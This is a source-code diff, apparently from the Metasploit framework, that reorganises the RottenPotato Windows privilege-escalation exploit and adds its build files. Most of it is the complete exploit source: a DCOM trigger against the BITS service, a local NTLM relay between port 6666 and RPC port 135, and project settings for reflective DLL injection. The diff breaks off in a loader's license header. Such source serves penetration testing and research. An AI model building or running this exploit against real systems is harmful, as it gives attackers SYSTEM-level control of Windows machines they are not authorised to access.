MSFRottenPotato}/stdafx.cpp | 0 .../{ => MSFRottenPotato}/stdafx.h | 0 .../{ => MSFRottenPotato}/targetver.h | 0 18 files changed, 1319 insertions(+), 453 deletions(-) create mode 100644 external/source/exploits/rottenpotato/MSFRottenPotato.sln rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/BlockingQueue.h (100%) rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/IStorageTrigger.cpp (100%) rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/IStorageTrigger.h (100%) rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/LocalNegotiator.cpp (100%) rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/LocalNegotiator.h (100%) rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/MSFRottenPotato.cpp (91%) rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/MSFRottenPotato.h (100%) create mode 100644 external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj create mode 100644 external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj.filters rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/ReflectiveDllInjection.h (97%) create mode 100644 external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveLoader.c rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/ReflectiveLoader.h (100%) rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/dllmain.cpp (95%) create mode 100644 external/source/exploits/rottenpotato/MSFRottenPotato/dump.stg rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/stdafx.cpp (100%) rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/stdafx.h (100%) rename external/source/exploits/rottenpotato/{ => MSFRottenPotato}/targetver.h (100%) diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato.sln b/external/source/exploits/rottenpotato/MSFRottenPotato.sln new file mode 100644 index 0000000000..56c5d0f2f8 --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato.sln @@ -0,0 +1,32 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 15 +VisualStudioVersion = 15.0.26403.7 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MSFRottenPotato", "MSFRottenPotato\MSFRottenPotato.vcxproj", "{4164003E-BA47-4A95-8586-D5AAC399C050}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {4164003E-BA47-4A95-8586-D5AAC399C050}.Debug|x64.ActiveCfg = Debug|x64 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Debug|x64.Build.0 = Debug|x64 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Debug|x86.ActiveCfg = Debug|Win32 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Debug|x86.Build.0 = Debug|Win32 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x64.ActiveCfg = Release|x64 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x64.Build.0 = Release|x64 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x64.Deploy.0 = Release|x64 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x86.ActiveCfg = Release|Win32 + {4164003E-BA47-4A95-8586-D5AAC399C050}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {F17C3DED-70DC-4318-B6D7-1477B2D4D79D} + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/rottenpotato/BlockingQueue.h b/external/source/exploits/rottenpotato/MSFRottenPotato/BlockingQueue.h similarity index 100% rename from external/source/exploits/rottenpotato/BlockingQueue.h rename to external/source/exploits/rottenpotato/MSFRottenPotato/BlockingQueue.h diff --git a/external/source/exploits/rottenpotato/IStorageTrigger.cpp b/external/source/exploits/rottenpotato/MSFRottenPotato/IStorageTrigger.cpp similarity index 100% rename from external/source/exploits/rottenpotato/IStorageTrigger.cpp rename to external/source/exploits/rottenpotato/MSFRottenPotato/IStorageTrigger.cpp diff --git a/external/source/exploits/rottenpotato/IStorageTrigger.h b/external/source/exploits/rottenpotato/MSFRottenPotato/IStorageTrigger.h similarity index 100% rename from external/source/exploits/rottenpotato/IStorageTrigger.h rename to external/source/exploits/rottenpotato/MSFRottenPotato/IStorageTrigger.h diff --git a/external/source/exploits/rottenpotato/LocalNegotiator.cpp b/external/source/exploits/rottenpotato/MSFRottenPotato/LocalNegotiator.cpp similarity index 100% rename from external/source/exploits/rottenpotato/LocalNegotiator.cpp rename to external/source/exploits/rottenpotato/MSFRottenPotato/LocalNegotiator.cpp diff --git a/external/source/exploits/rottenpotato/LocalNegotiator.h b/external/source/exploits/rottenpotato/MSFRottenPotato/LocalNegotiator.h similarity index 100% rename from external/source/exploits/rottenpotato/LocalNegotiator.h rename to external/source/exploits/rottenpotato/MSFRottenPotato/LocalNegotiator.h diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato.cpp b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.cpp similarity index 91% rename from external/source/exploits/rottenpotato/MSFRottenPotato.cpp rename to external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.cpp index 5ae698c51c..ca2dfaf98a 100644 --- a/external/source/exploits/rottenpotato/MSFRottenPotato.cpp +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.cpp @@ -1,374 +1,374 @@ -#include "stdafx.h" -#include "MSFRottenPotato.h" -#include "IStorageTrigger.h" -#include -#include -#include -#include -#include -#pragma comment (lib, "Ws2_32.lib") -#pragma comment (lib, "Mswsock.lib") -#pragma comment (lib, "AdvApi32.lib") - -int CMSFRottenPotato::newConnection; - -// This is the constructor of a class that has been exported. -// see MSFRottenPotato.h for the class definition -CMSFRottenPotato::CMSFRottenPotato() -{ - comSendQ = new BlockingQueue(); - rpcSendQ = new BlockingQueue(); - newConnection = 0; - negotiator = new LocalNegotiator(); - return; -} - - -DWORD CMSFRottenPotato::startRPCConnectionThread() { - DWORD ThreadID; - CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)staticStartRPCConnection, (void*) this, 0, &ThreadID); - return ThreadID; -} - -DWORD CMSFRottenPotato::startCOMListenerThread() { - DWORD ThreadID; - CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)staticStartCOMListener, (void*) this, 0, &ThreadID); - return ThreadID; -} - -DWORD WINAPI CMSFRottenPotato::staticStartRPCConnection(void* Param) -{ - CMSFRottenPotato* This = (CMSFRottenPotato*)Param; - return This->startRPCConnection(); -} - -DWORD WINAPI CMSFRottenPotato::staticStartCOMListener(void* Param) -{ - CMSFRottenPotato* This = (CMSFRottenPotato*)Param; - return This->startCOMListener(); -} - -int CMSFRottenPotato::findNTLMBytes(char *bytes,int len) { - //Find the NTLM bytes in a packet and return the index to the start of the NTLMSSP header. - //The NTLM bytes (for our purposes) are always at the end of the packet, so when we find the header, - //we can just return the index - char pattern[7] = { 0x4E, 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50 }; - int pIdx = 0; - int i; - for (i = 0; i < len; i++) { - if (bytes[i] == pattern[pIdx]) { - pIdx = pIdx + 1; - if (pIdx == 7) return (i - 6); - } - else { - pIdx = 0; - } - } - return -1; -} - -int CMSFRottenPotato::processNtlmBytes(char *bytes, int len) { - int ntlmLoc = findNTLMBytes(bytes, len); - if (ntlmLoc == -1) return -1; - - int messageType = bytes[ntlmLoc + 8]; - switch (messageType) { - //NTLM type 1 message - case 1: - negotiator->handleType1(bytes + ntlmLoc, len - ntlmLoc); - break; - //NTLM type 2 message - case 2: - negotiator->handleType2(bytes + ntlmLoc, len - ntlmLoc); - break; - //NTLM type 3 message - case 3: - negotiator->handleType3(bytes + ntlmLoc, len - ntlmLoc); - break; - default: - return -1; - break; - } - return 0; -} - -int checkForNewConnection(SOCKET* ListenSocket, SOCKET* ClientSocket) { - fd_set readSet; - FD_ZERO(&readSet); - FD_SET(*ListenSocket, &readSet); - timeval timeout; - timeout.tv_sec = 1; // Zero timeout (poll) - timeout.tv_usec = 0; - if (select(*ListenSocket, &readSet, NULL, NULL, &timeout) == 1) { - *ClientSocket = accept(*ListenSocket, NULL, NULL); - return 1; - } - return 0; -} - -int CMSFRottenPotato::triggerDCOM(void) -{ - CoInitialize(nullptr); - - //Create IStorage object - IStorage *stg = NULL; - ILockBytes *lb = NULL; - CreateILockBytesOnHGlobal(NULL, true, &lb); - StgCreateDocfileOnILockBytes(lb, STGM_CREATE | STGM_READWRITE | STGM_SHARE_EXCLUSIVE, 0, &stg); - - //Initialze IStorageTrigger object - IStorageTrigger* t = new IStorageTrigger(stg); - - //Prep a few more args for CoGetInstanceFromIStorage - CLSID clsid; - //BITS IID - CLSIDFromString(OLESTR("{4991d34b-80a1-4291-83b6-3328366b9097}"), &clsid); - CLSID tmp; - //IUnknown IID - CLSIDFromString(OLESTR("{00000000-0000-0000-C000-000000000046}"), &tmp); - MULTI_QI qis[1]; - qis[0].pIID = &tmp; - qis[0].pItf = NULL; - qis[0].hr = 0; - - //Call CoGetInstanceFromIStorage - HRESULT status = CoGetInstanceFromIStorage(NULL, &clsid, NULL, CLSCTX_LOCAL_SERVER, t, 1, qis); - - return 0; -} - -int CMSFRottenPotato::startRPCConnection(void) { - const int DEFAULT_BUFLEN = 4096; - PCSTR DEFAULT_PORT = "135"; - PCSTR host = "127.0.0.1"; - - WSADATA wsaData; - SOCKET ConnectSocket = INVALID_SOCKET; - struct addrinfo *result = NULL, - *ptr = NULL, - hints; - - char *sendbuf; - char recvbuf[DEFAULT_BUFLEN]; - int iResult; - int recvbuflen = DEFAULT_BUFLEN; - - // Initialize Winsock - iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); - if (iResult != 0) { - return 1; - } - - ZeroMemory(&hints, sizeof(hints)); - hints.ai_family = AF_UNSPEC; - hints.ai_socktype = SOCK_STREAM; - hints.ai_protocol = IPPROTO_TCP; - - // Resolve the server address and port - iResult = getaddrinfo(host, DEFAULT_PORT, &hints, &result); - if (iResult != 0) { - WSACleanup(); - return 1; - } - - // Attempt to connect to an address until one succeeds - for (ptr = result; ptr != NULL; ptr = ptr->ai_next) { - - // Create a SOCKET for connecting to server - ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, - ptr->ai_protocol); - if (ConnectSocket == INVALID_SOCKET) { - WSACleanup(); - return 1; - } - - // Connect to server. - iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); - if (iResult == SOCKET_ERROR) { - closesocket(ConnectSocket); - ConnectSocket = INVALID_SOCKET; - continue; - } - break; - } - - if (ConnectSocket == INVALID_SOCKET) { - WSACleanup(); - return 1; - } - - // Send/Receive until the peer closes the connection - do { - - //Monitor our sendQ until we have some data to send - int *len = (int*)rpcSendQ->wait_pop(); - sendbuf = rpcSendQ->wait_pop(); - - //Check if we should be opening a new socket before we send the data - if (newConnection == 1) { - //closesocket(ConnectSocket); - ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,ptr->ai_protocol); - connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); - newConnection = 0; - } - - iResult = send(ConnectSocket, sendbuf, *len, 0); - if (iResult == SOCKET_ERROR) { - closesocket(ConnectSocket); - WSACleanup(); - return 1; - } - - iResult = recv(ConnectSocket, recvbuf, recvbuflen, 0); - if (iResult > 0) { - comSendQ->push((char*)&iResult); - comSendQ->push(recvbuf); - } - else if (iResult == 0) - printf("RPC-> Connection closed\n"); - else - printf("RPC -> recv failed with error: %d\n", WSAGetLastError()); - - } while (iResult > 0); - - // cleanup - iResult = shutdown(ConnectSocket, SD_SEND); - closesocket(ConnectSocket); - WSACleanup(); - - return 0; -} - -int CMSFRottenPotato::startCOMListener(void) { - const int DEFAULT_BUFLEN = 4096; - PCSTR DEFAULT_PORT = "6666"; - - WSADATA wsaData; - int iResult; - - SOCKET ListenSocket = INVALID_SOCKET; - SOCKET ClientSocket = INVALID_SOCKET; - - struct addrinfo *result = NULL; - struct addrinfo hints; - - int iSendResult; - char *sendbuf; - - char recvbuf[DEFAULT_BUFLEN]; - int recvbuflen = DEFAULT_BUFLEN; - - // Initialize Winsock - iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); - if (iResult != 0) { - return 1; - } - - ZeroMemory(&hints, sizeof(hints)); - hints.ai_family = AF_INET; - hints.ai_socktype = SOCK_STREAM; - hints.ai_protocol = IPPROTO_TCP; - hints.ai_flags = AI_PASSIVE; - - // Resolve the server address and port - iResult = getaddrinfo(NULL, DEFAULT_PORT, &hints, &result); - if (iResult != 0) { - WSACleanup(); - return 1; - } - - // Create a SOCKET for connecting to server - ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol); - if (ListenSocket == INVALID_SOCKET) { - freeaddrinfo(result); - WSACleanup(); - return 1; - } - - // Setup the TCP listening socket - iResult = bind(ListenSocket, result->ai_addr, (int)result->ai_addrlen); - if (iResult == SOCKET_ERROR) { - freeaddrinfo(result); - closesocket(ListenSocket); - WSACleanup(); - return 1; - } - - freeaddrinfo(result); - - iResult = listen(ListenSocket, SOMAXCONN); - if (iResult == SOCKET_ERROR) { - closesocket(ListenSocket); - WSACleanup(); - return 1; - } - - // Accept a client socket - ClientSocket = accept(ListenSocket, NULL, NULL); - if (ClientSocket == INVALID_SOCKET) { - closesocket(ListenSocket); - WSACleanup(); - return 1; - } - - // Receive until the peer shuts down the connection - int ntlmLoc; - do { - iResult = recv(ClientSocket, recvbuf, recvbuflen, 0); - if (iResult > 0) { - - //check to see if the received packet has NTLM auth information - processNtlmBytes(recvbuf, iResult); - - //Send all incoming packets to the WinRPC sockets "send queue" and wait for the WinRPC socket to put a packet into our "send queue" - //put packet in winrpc_sendq - rpcSendQ->push((char*)&iResult); - rpcSendQ->push(recvbuf); - - //block and wait for a new item in our sendq - int* len = (int*)comSendQ->wait_pop(); - sendbuf = comSendQ->wait_pop(); - - //Check to see if this is a packet containing NTLM authentication information before sending - processNtlmBytes(sendbuf, *len); - - //send the new packet sendbuf - iSendResult = send(ClientSocket, sendbuf, *len, 0); - - if (iSendResult == SOCKET_ERROR) { - closesocket(ClientSocket); - WSACleanup(); - return 1; - } - - //Sometimes Windows likes to open a new connection instead of using the current one - //Allow for this by waiting for 1s and replacing the ClientSocket if a new connection is incoming - newConnection = checkForNewConnection(&ListenSocket, &ClientSocket); - } - else if (iResult == 0) - printf("Connection closing...\n"); - else { - closesocket(ClientSocket); - WSACleanup(); - return 1; - } - - } while (iResult > 0); - - // shutdown the connection since we're done - iResult = shutdown(ClientSocket, SD_SEND); - if (iResult == SOCKET_ERROR) { - closesocket(ClientSocket); - WSACleanup(); - return 1; - } - - // cleanup - closesocket(ClientSocket); - WSACleanup(); - - closesocket(ListenSocket); - WSACleanup(); - - return 0; -} +#include "stdafx.h" +#include "MSFRottenPotato.h" +#include "IStorageTrigger.h" +#include +#include +#include +#include +#include +#pragma comment (lib, "Ws2_32.lib") +#pragma comment (lib, "Mswsock.lib") +#pragma comment (lib, "AdvApi32.lib") + +int CMSFRottenPotato::newConnection; + +// This is the constructor of a class that has been exported. +// see MSFRottenPotato.h for the class definition +CMSFRottenPotato::CMSFRottenPotato() +{ + comSendQ = new BlockingQueue(); + rpcSendQ = new BlockingQueue(); + newConnection = 0; + negotiator = new LocalNegotiator(); + return; +} + + +DWORD CMSFRottenPotato::startRPCConnectionThread() { + DWORD ThreadID; + CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)staticStartRPCConnection, (void*)this, 0, &ThreadID); + return ThreadID; +} + +DWORD CMSFRottenPotato::startCOMListenerThread() { + DWORD ThreadID; + CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)staticStartCOMListener, (void*)this, 0, &ThreadID); + return ThreadID; +} + +DWORD WINAPI CMSFRottenPotato::staticStartRPCConnection(void* Param) +{ + CMSFRottenPotato* This = (CMSFRottenPotato*)Param; + return This->startRPCConnection(); +} + +DWORD WINAPI CMSFRottenPotato::staticStartCOMListener(void* Param) +{ + CMSFRottenPotato* This = (CMSFRottenPotato*)Param; + return This->startCOMListener(); +} + +int CMSFRottenPotato::findNTLMBytes(char *bytes, int len) { + //Find the NTLM bytes in a packet and return the index to the start of the NTLMSSP header. + //The NTLM bytes (for our purposes) are always at the end of the packet, so when we find the header, + //we can just return the index + char pattern[7] = { 0x4E, 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50 }; + int pIdx = 0; + int i; + for (i = 0; i < len; i++) { + if (bytes[i] == pattern[pIdx]) { + pIdx = pIdx + 1; + if (pIdx == 7) return (i - 6); + } + else { + pIdx = 0; + } + } + return -1; +} + +int CMSFRottenPotato::processNtlmBytes(char *bytes, int len) { + int ntlmLoc = findNTLMBytes(bytes, len); + if (ntlmLoc == -1) return -1; + + int messageType = bytes[ntlmLoc + 8]; + switch (messageType) { + //NTLM type 1 message + case 1: + negotiator->handleType1(bytes + ntlmLoc, len - ntlmLoc); + break; + //NTLM type 2 message + case 2: + negotiator->handleType2(bytes + ntlmLoc, len - ntlmLoc); + break; + //NTLM type 3 message + case 3: + negotiator->handleType3(bytes + ntlmLoc, len - ntlmLoc); + break; + default: + return -1; + break; + } + return 0; +} + +int checkForNewConnection(SOCKET* ListenSocket, SOCKET* ClientSocket) { + fd_set readSet; + FD_ZERO(&readSet); + FD_SET(*ListenSocket, &readSet); + timeval timeout; + timeout.tv_sec = 1; // Zero timeout (poll) + timeout.tv_usec = 0; + if (select(*ListenSocket, &readSet, NULL, NULL, &timeout) == 1) { + *ClientSocket = accept(*ListenSocket, NULL, NULL); + return 1; + } + return 0; +} + +int CMSFRottenPotato::triggerDCOM(void) +{ + CoInitialize(nullptr); + + //Create IStorage object + IStorage *stg = NULL; + ILockBytes *lb = NULL; + CreateILockBytesOnHGlobal(NULL, true, &lb); + StgCreateDocfileOnILockBytes(lb, STGM_CREATE | STGM_READWRITE | STGM_SHARE_EXCLUSIVE, 0, &stg); + + //Initialze IStorageTrigger object + IStorageTrigger* t = new IStorageTrigger(stg); + + //Prep a few more args for CoGetInstanceFromIStorage + CLSID clsid; + //BITS IID + CLSIDFromString(OLESTR("{4991d34b-80a1-4291-83b6-3328366b9097}"), &clsid); + CLSID tmp; + //IUnknown IID + CLSIDFromString(OLESTR("{00000000-0000-0000-C000-000000000046}"), &tmp); + MULTI_QI qis[1]; + qis[0].pIID = &tmp; + qis[0].pItf = NULL; + qis[0].hr = 0; + + //Call CoGetInstanceFromIStorage + HRESULT status = CoGetInstanceFromIStorage(NULL, &clsid, NULL, CLSCTX_LOCAL_SERVER, t, 1, qis); + + return 0; +} + +int CMSFRottenPotato::startRPCConnection(void) { + const int DEFAULT_BUFLEN = 4096; + PCSTR DEFAULT_PORT = "135"; + PCSTR host = "127.0.0.1"; + + WSADATA wsaData; + SOCKET ConnectSocket = INVALID_SOCKET; + struct addrinfo *result = NULL, + *ptr = NULL, + hints; + + char *sendbuf; + char recvbuf[DEFAULT_BUFLEN]; + int iResult; + int recvbuflen = DEFAULT_BUFLEN; + + // Initialize Winsock + iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); + if (iResult != 0) { + return 1; + } + + ZeroMemory(&hints, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + hints.ai_protocol = IPPROTO_TCP; + + // Resolve the server address and port + iResult = getaddrinfo(host, DEFAULT_PORT, &hints, &result); + if (iResult != 0) { + WSACleanup(); + return 1; + } + + // Attempt to connect to an address until one succeeds + for (ptr = result; ptr != NULL; ptr = ptr->ai_next) { + + // Create a SOCKET for connecting to server + ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, + ptr->ai_protocol); + if (ConnectSocket == INVALID_SOCKET) { + WSACleanup(); + return 1; + } + + // Connect to server. + iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); + if (iResult == SOCKET_ERROR) { + closesocket(ConnectSocket); + ConnectSocket = INVALID_SOCKET; + continue; + } + break; + } + + if (ConnectSocket == INVALID_SOCKET) { + WSACleanup(); + return 1; + } + + // Send/Receive until the peer closes the connection + do { + + //Monitor our sendQ until we have some data to send + int *len = (int*)rpcSendQ->wait_pop(); + sendbuf = rpcSendQ->wait_pop(); + + //Check if we should be opening a new socket before we send the data + if (newConnection == 1) { + //closesocket(ConnectSocket); + ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol); + connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); + newConnection = 0; + } + + iResult = send(ConnectSocket, sendbuf, *len, 0); + if (iResult == SOCKET_ERROR) { + closesocket(ConnectSocket); + WSACleanup(); + return 1; + } + + iResult = recv(ConnectSocket, recvbuf, recvbuflen, 0); + if (iResult > 0) { + comSendQ->push((char*)&iResult); + comSendQ->push(recvbuf); + } + else if (iResult == 0) + printf("RPC-> Connection closed\n"); + else + printf("RPC -> recv failed with error: %d\n", WSAGetLastError()); + + } while (iResult > 0); + + // cleanup + iResult = shutdown(ConnectSocket, SD_SEND); + closesocket(ConnectSocket); + WSACleanup(); + + return 0; +} + +int CMSFRottenPotato::startCOMListener(void) { + const int DEFAULT_BUFLEN = 4096; + PCSTR DEFAULT_PORT = "6666"; + + WSADATA wsaData; + int iResult; + + SOCKET ListenSocket = INVALID_SOCKET; + SOCKET ClientSocket = INVALID_SOCKET; + + struct addrinfo *result = NULL; + struct addrinfo hints; + + int iSendResult; + char *sendbuf; + + char recvbuf[DEFAULT_BUFLEN]; + int recvbuflen = DEFAULT_BUFLEN; + + // Initialize Winsock + iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); + if (iResult != 0) { + return 1; + } + + ZeroMemory(&hints, sizeof(hints)); + hints.ai_family = AF_INET; + hints.ai_socktype = SOCK_STREAM; + hints.ai_protocol = IPPROTO_TCP; + hints.ai_flags = AI_PASSIVE; + + // Resolve the server address and port + iResult = getaddrinfo(NULL, DEFAULT_PORT, &hints, &result); + if (iResult != 0) { + WSACleanup(); + return 1; + } + + // Create a SOCKET for connecting to server + ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol); + if (ListenSocket == INVALID_SOCKET) { + freeaddrinfo(result); + WSACleanup(); + return 1; + } + + // Setup the TCP listening socket + iResult = bind(ListenSocket, result->ai_addr, (int)result->ai_addrlen); + if (iResult == SOCKET_ERROR) { + freeaddrinfo(result); + closesocket(ListenSocket); + WSACleanup(); + return 1; + } + + freeaddrinfo(result); + + iResult = listen(ListenSocket, SOMAXCONN); + if (iResult == SOCKET_ERROR) { + closesocket(ListenSocket); + WSACleanup(); + return 1; + } + + // Accept a client socket + ClientSocket = accept(ListenSocket, NULL, NULL); + if (ClientSocket == INVALID_SOCKET) { + closesocket(ListenSocket); + WSACleanup(); + return 1; + } + + // Receive until the peer shuts down the connection + int ntlmLoc; + do { + iResult = recv(ClientSocket, recvbuf, recvbuflen, 0); + if (iResult > 0) { + + //check to see if the received packet has NTLM auth information + processNtlmBytes(recvbuf, iResult); + + //Send all incoming packets to the WinRPC sockets "send queue" and wait for the WinRPC socket to put a packet into our "send queue" + //put packet in winrpc_sendq + rpcSendQ->push((char*)&iResult); + rpcSendQ->push(recvbuf); + + //block and wait for a new item in our sendq + int* len = (int*)comSendQ->wait_pop(); + sendbuf = comSendQ->wait_pop(); + + //Check to see if this is a packet containing NTLM authentication information before sending + processNtlmBytes(sendbuf, *len); + + //send the new packet sendbuf + iSendResult = send(ClientSocket, sendbuf, *len, 0); + + if (iSendResult == SOCKET_ERROR) { + closesocket(ClientSocket); + WSACleanup(); + return 1; + } + + //Sometimes Windows likes to open a new connection instead of using the current one + //Allow for this by waiting for 1s and replacing the ClientSocket if a new connection is incoming + newConnection = checkForNewConnection(&ListenSocket, &ClientSocket); + } + else if (iResult == 0) + printf("Connection closing...\n"); + else { + closesocket(ClientSocket); + WSACleanup(); + return 1; + } + + } while (iResult > 0); + + // shutdown the connection since we're done + iResult = shutdown(ClientSocket, SD_SEND); + if (iResult == SOCKET_ERROR) { + closesocket(ClientSocket); + WSACleanup(); + return 1; + } + + // cleanup + closesocket(ClientSocket); + WSACleanup(); + + closesocket(ListenSocket); + WSACleanup(); + + return 0; +} diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato.h b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.h similarity index 100% rename from external/source/exploits/rottenpotato/MSFRottenPotato.h rename to external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.h diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj new file mode 100644 index 0000000000..3b69b6ed68 --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj @@ -0,0 +1,195 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + {4164003E-BA47-4A95-8586-D5AAC399C050} + Win32Proj + MSFRottenPotato + 8.1 + + + + DynamicLibrary + true + v141 + Unicode + + + DynamicLibrary + false + v141 + true + Unicode + + + DynamicLibrary + true + v141 + Unicode + + + DynamicLibrary + false + v141 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + true + + + false + + + false + + + + Use + Level3 + Disabled + WIN32;_DEBUG;_WINDOWS;_USRDLL;MSFROTTENPOTATO_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + true + MultiThreaded + + + Windows + true + secur32.lib;%(AdditionalDependencies) + + + + + Use + Level3 + Disabled + _DEBUG;_WINDOWS;_USRDLL;MSFROTTENPOTATO_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + true + MultiThreaded + + + Windows + true + secur32.lib;%(AdditionalDependencies) + true + + + + + Level3 + NotUsing + MaxSpeed + true + true + WIN32;NDEBUG;_WINDOWS;_USRDLL;MSFROTTENPOTATO_EXPORTS;_CRT_SECURE_NO_WARNINGS;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) + true + MultiThreaded + + + Windows + true + true + true + secur32.lib;%(AdditionalDependencies) + + + + + Level3 + NotUsing + MaxSpeed + true + true + NDEBUG;_WINDOWS;_USRDLL;MSFROTTENPOTATO_EXPORTS;_CRT_SECURE_NO_WARNINGS;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) + true + MultiThreaded + + + Windows + true + true + true + secur32.lib;%(AdditionalDependencies) + + + + + + + + + + + + + + + + + + false + + + false + + + false + + + false + + + + + + + + + Create + Create + Create + Create + + + + + + \ No newline at end of file diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj.filters b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj.filters new file mode 100644 index 0000000000..0d10aeb8be --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj.filters @@ -0,0 +1,66 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + Header Files + + + + + Source Files + + + Source Files + + + Source Files + + + Source Files + + + Source Files + + + Source Files + + + \ No newline at end of file diff --git a/external/source/exploits/rottenpotato/ReflectiveDllInjection.h b/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveDllInjection.h similarity index 97% rename from external/source/exploits/rottenpotato/ReflectiveDllInjection.h rename to external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveDllInjection.h index ac54beb26a..d44a8d7079 100644 --- a/external/source/exploits/rottenpotato/ReflectiveDllInjection.h +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveDllInjection.h @@ -49,3 +49,4 @@ typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID); //===============================================================================================// #endif //===============================================================================================// +#pragma once diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveLoader.c b/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveLoader.c new file mode 100644 index 0000000000..8aec0f6d2b --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveLoader.c @@ -0,0 +1,572 @@ +//===============================================================================================// +// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted +// provided that the following conditions are met: +// +// * Redistributions of source code must retain the above copyright notice, this list of +// conditions and the following disclaimer. +// +// * Redistributions in binary form must reproduce the above copyright notice, this list of +// conditions and the following disclaimer in the documentation and/or other materials provided +// with the distribution. +// +// * Neither the name of Harmony Security nor the names of its 